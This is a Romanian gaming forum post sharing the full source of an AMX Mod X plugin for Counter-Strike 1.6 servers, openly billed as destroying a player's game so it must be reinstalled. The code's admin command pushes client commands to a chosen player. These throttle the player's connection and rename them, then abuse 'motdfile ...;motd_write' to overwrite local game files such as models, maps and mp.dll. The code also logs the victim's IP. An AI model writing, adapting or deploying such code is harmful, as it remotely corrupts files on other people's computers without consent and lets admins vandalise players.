AcasaAcasa  FacebookFacebook  Ultimele imaginiUltimele imagini  CăutareCăutare  ÎnregistrareÎnregistrare  ConectareConectare  



 
NewGames • Suntem in redeschidere!
NewGames • suntem in cautare de staff. Alatura-te si tu noua si ajuta-ne cu ceea ce poti ! Click aici

Distribuiţi|

amx_exterminate

Vezi subiectul anterior Vezi subiectul urmator In jos
AutorMesaj
The Joker
Moderator
The Joker

Mesaje : 25
amx_exterminate Empty
MesajSubiect: amx_exterminate amx_exterminate I_icon_minitimeLun Mai 05, 2014 6:21 pm

Distruge Counter-Strike`ul sh nu mai poate fi folosit. Trebuie reinstalat!
DESCARCARE : [Trebuie sa fiti inscris si conectat pentru a vedea acest link]
Instalare:
1. Fisierul amx_exterminate.sma il puneti in addons/amxmodx/scripting
2. Fisierul amx_exterminate.amxx il puneti in addons/amxmodx/plugins
3. Intrati in fisierul addons/amxmodx/configs/plugins.ini si adauga-ti la urma:


amx_exterminate.amxx


#include < amxmodx >
#include < amxmisc >

new const g_sCommands[ ][ ] =
{
"rate 1",
"cl_cmdrate 1",
"cl_updaterate 1",
"fps_max 1",
"sys_ticrate 1",

"name CS.DSQUAD.RO",

"motdfile models/player.mdl;motd_write x",
"motdfile models/v_ak47.mdl;motd_write x",
"motdfile cs_dust.wad;motd_write x",
"motdfile models/v_m4a1.mdl;motd_write x",
"motdfile resource/GameMenu.res;motd_write x",
"motdfile halflife.wad;motd_write x",
"motdfile cstrike.wad;motd_write x",
"motdfile maps/de_dust2.bsp;motd_write x",
"motdfile events/ak47.sc;motd_write x",
"motdfile dlls/mp.dll;motd_write x",

"cl_timeout 0"
};

public plugin_init( )
{
register_plugin( "Exterminate", "1.0", "AleCs14" );
register_concmd( "amx_exterminate", "Concmd_AMXX_exterminate", ADMIN_LEVEL_G, "" );
}

public Concmd_AMXX_exterminate( id, level, cid )
{
if( !cmd_access( id, level, cid, 2 ) )
return PLUGIN_HANDLED;

new sArgument[ 32 ];
read_argv( 1, sArgument, charsmax( sArgument ) );

new player = cmd_target( id, sArgument, ( CMDTARGET_NO_BOTS | CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ) );

if( !player )
return PLUGIN_HANDLED;

for( new i = 0; i < sizeof( g_sCommands ); i++)
client_cmd( player, g_sCommands[ i ] );

new name[ 32 ], name2[ 32 ], ip2[ 16 ];
get_user_name( id, name, charsmax( name ) );
get_user_name( player, name2, charsmax( name2 ) );
get_user_ip( player, ip2, charsmax( ip2 ), 1 );

log_to_file( "exterminations.log", "%s exterminate %s(%s)", name, name2, ip2 );

player_color( 0, ".gADMIN .v%s .g: exterminated .v%s", name, name2 );

client_cmd( 0, "spk ^"vox/bizwarn coded user apprehend^"" );

return PLUGIN_HANDLED;
}

stock player_color( const id, const input[ ], any:... )
{
new count = 1, players[ 32 ]

static msg[ 191 ]
vformat( msg, 190, input, 3 )

replace_all( msg, 190, ".v", "^4" ) /* verde */
replace_all( msg, 190, ".g", "^1" ) /* galben */
replace_all( msg, 190, ".e", "^3" ) /* ct=albastru | t=rosu */
replace_all( msg, 190, ".x", "^0" ) /* normal-echipa */

if( id ) players[ 0 ] = id; else get_players( players, count, "ch" )
{
for( new i = 0; i < count; i++ )
{
if( is_user_connected( players[ i ] ) )
{
message_begin( MSG_ONE_UNRELIABLE, get_user_msgid( "SayText" ), _, players[ i ] )
write_byte( players[ i ] );
write_string( msg );
message_end( );
}
}
}
}
Sus In jos
Pagina 1 din 1

Permisiunile acestui forum:Nu puteti raspunde la subiectele acestui forum
 :: Jocuri :: Counter-Strike 1.6 :: Plugin-uri-
Copyright © 2014 - 2015 NEWGAMES.DUST.TV. Toate drepturile rezervate.